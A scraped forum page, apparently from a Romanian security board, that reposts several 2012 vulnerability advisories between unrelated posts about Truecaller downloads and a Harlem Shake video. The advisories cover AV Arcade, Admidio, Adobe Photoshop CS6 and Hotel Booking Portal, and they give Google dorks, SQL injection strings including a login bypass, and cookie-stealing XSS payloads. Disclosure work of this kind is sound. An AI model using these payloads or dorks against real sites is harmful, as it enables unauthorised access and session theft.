Still find any probs refer Link for downoad: http://handheld.softpedia.com/get/System...8870.shtml
For android users : Just goto android market and search Truecaller and voila
Still find any probs refer Link for downoad: http://www.truecaller.com/blog/2011/11/2...-download/
For apple users : Search Truecaller
Still find any probs refer link for download: Get TrueCaller - Caller ID for your mobile with TrueCaller
Alternatively you can browse to : m.truecaller.com and download directly in your mobile
Sursa: http://hackforums.net
-
AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection
##########################################
[~] Exploit Title: AV Arcade Free Edition Blind SQL Injection
[~] Date: 31/08/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.avscripts.net/avarcade/freearcadescript/
[~] Google Dork: intext:Powered by AV Arcade Free Edition"
##########################################
# Exploit-DB Note: Must be logged in.
[#] [ Exploit ]
http://localhost/content/add_rating.php?id=[Blind SQL Injection]
##########################################
[*] thanks to : All LibyanCA Members ()
##########################################Sursa: AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection
-
Admidio 2.3.5 Multiple Vulnerabilities
Advisory: Admidio 2.3.5 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-019
Author: Stefan Schurtz
Affected Software: Successfully tested on Admidio 2.3.5
Vendor URL: http://www.admidio.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities
==================
PoC-Exploit
==================
//SQLi
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "
=========
Solution
=========
Upgrade to the latest version 2.3.6
====================
Disclosure Timeline
====================
21-Aug-2012 - developer informed
21-Aug-2012 - feedback from developer
28-Aug-2012 - fixed in version 2.3.6
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.admidio.org/forum/viewtopic.php?t=5108
http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt -
Adobe Photoshop CS6 PNG Parsing Heap Overflow
#####################################################################################
Application: Adobe Photoshop CS6 PNG Parsing Heap Overflow
Platforms: Windows & Macintosh
Versions: 13.x
Secunia: SA49141
{PRL}: 2012-27
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated.
Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS.
Thus, Adobe Photoshop CS6 is the 13th major release of Adobe Photoshop. The CS rebranding also resulted
in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price.
Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the
Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[6]
Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard,
which includes the Adobe Photoshop edition. Alongside Photoshop and Photoshop Extended, Adobe also
publishes Photoshop Elements and Photoshop Lightroom, collectively called "The Adobe Photoshop Family".
In 2008, Adobe released Adobe Photoshop Express, a free web-based image editing tool to edit photos directly
on blogs and social networking sites; in 2011 a version was released for the Android operating system and the
iOS operating system.[7][8] Adobe only supports Windows and Macintosh versions of Photoshop, but using Wine,
Photoshop CS6 can run well on Linux
(http://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2012-05-10 Vulnerability reported to Secunia
2012-08-31 Publication of this advisory
#####################################################################################
============================
3) Technical details
============================
The vulnerability is caused due to a boundary error in the "Standart MultiPlugin.8BF" module
when processing a Portable Network Graphics (PNG) image. This can be exploited to cause
a heap-based buffer overflow via a specially crafted "tRNS" chunk size. Successful exploitation
may allow execution of arbitrary code, but requires tricking a user into opening a malicious image.
#####################################################################################
===========
4) POC
===========
http://www.protekresearchlab.com/exploits/PRL-2012-27.png
http://www.exploit-db.com/sploits/20971.png -
-
-
-
-
Hotel Booking Portal v0.1 Multiple Vulnerabilities
# -----------------------------------------------------------
# _____ _ _ _ _
# / ____(_) | | | | |
# | | _| |_ __ _ __| | ___| |
# | | | | __/ _` |/ _` |/ _ \ |
# | |____| | || (_| | (_| | __/ |
# \_____|_|\__\__,_|\__,_|\___|_|
#
# -----------------------------------------------------------
# Hotel Booking Portal v0.1 Multiple Vulnerabilities
# Google dork: "Made And Powered By Hotels Portal"
# Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
# Date 09/08/2012
# Download - http://sourceforge.net/projects/hbportal/
# ISRAEL
# -----------------------------------------------------------
# Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
# 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
# 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
# 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# 1). POST a form to login.php with the value of:
# email set to : ' or '1'='1
# password set to : ' or '1'='1
# 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
# ----------------------------------------------------------- -
Harlem Shake RO :)
in Off-topic
Posted
Teribil!